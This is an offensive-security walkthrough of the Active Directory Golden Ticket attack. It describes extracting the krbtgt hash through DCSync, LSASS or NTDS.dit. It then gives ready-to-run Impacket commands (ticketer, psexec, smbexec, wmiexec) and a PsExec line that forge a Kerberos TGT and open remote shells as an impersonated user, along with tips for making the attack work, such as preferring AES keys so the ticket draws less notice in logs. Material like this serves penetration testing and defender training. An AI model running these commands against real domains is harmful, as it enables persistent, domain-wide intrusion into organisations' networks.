This attack assumes that a Domain Controller has already been compromised so that the krbtgt account hash can be extracted; that hash is the prerequisite for a successful Golden Ticket attack.
A Golden Ticket attack consists of forging a Ticket Granting Ticket (TGT) for any user by using the NTLM hash (or AES key) of the Active Directory (AD) krbtgt account. Because the forged TGT is encrypted with the krbtgt key, the domain accepts it as legitimate, so it grants access to any service or machine within the domain as the impersonated user. Keep in mind that the krbtgt account's password is never rotated automatically: a forged ticket stays valid until the krbtgt password has been changed twice (AD still honours tickets encrypted with the previous key).
To acquire the NTLM hash of the krbtgt account, various methods can be employed. It can be extracted from the memory of the Local Security Authority Subsystem Service (LSASS) process or from the NT Directory Services database (NTDS.dit) on any Domain Controller (DC) in the domain. Alternatively, a DCSync attack asks a DC to replicate the hash over the directory replication protocol; this can be performed with the lsadump::dcsync module in Mimikatz or the secretsdump.py script from Impacket. All of these operations require Domain Admin privileges or an equivalent level of access (for DCSync, the replication rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object).
Once the Golden Ticket is injected into your session, you can access administrative shares (C$) and create services or run WMI on remote machines, so PsExec or wmiexec can be used to obtain a shell (it does not appear to be possible to get a shell via WinRM this way).
Switching back to the console the attacker used to create the Golden Ticket (running as local admin) and attempting again to access the C$ share of the domain controller, this time the access succeeds:
Or run cmd on the remote machine with PsExec (Sysinternals):
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Golden Ticket Attack from Linux
Requirements:
krbtgt NTLM hash (or AES key)
Domain SID (S-1-5-21-...; the SID of the domain itself, without a trailing RID)
Domain name
# get the domain SID: Get-ADDomain is from the RSAT ActiveDirectory module (see the DomainSID field); the PowerView equivalent is Get-DomainSID
Get-ADDomain <domain_name>
#impacket
# generate the TGT with the krbtgt NTLM hash (ticketer writes the ticket to <user>.ccache, here NewAdmin.ccache)
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> NewAdmin
# generate the TGT with the krbtgt AES key (aes128 or aes256); preferable, since an RC4-encrypted TGT stands out in Kerberos event logs
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> NewAdmin
# point Impacket at the forged TGT (the ccache file created above)
export KRB5CCNAME=NewAdmin.ccache
# execute a remote command with any of the following by using the TGT (-k uses the Kerberos ccache, -no-pass skips the password prompt)
impacket-psexec <domain_name>/NewAdmin@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/NewAdmin@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/NewAdmin@<remote_hostname> -k -no-pass
Don't forget to use the hostname (FQDN) of the remote server rather than its IP address: the service ticket is requested for the SPN cifs/<remote_hostname>, and an IP address will not match. If the name does not resolve, add it to /etc/hosts, and pass -dc-ip <dc_ip> if the KDC cannot be located via DNS.
If you get "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)",
it means the clock on the Kali Linux machine differs from the remote machine's by more than the allowed tolerance (5 minutes by default), because Kerberos tickets and authenticators carry timestamps. Sync your clock with the DC, e.g. sudo ntpdate <dc_hostname_or_ip>, and retry.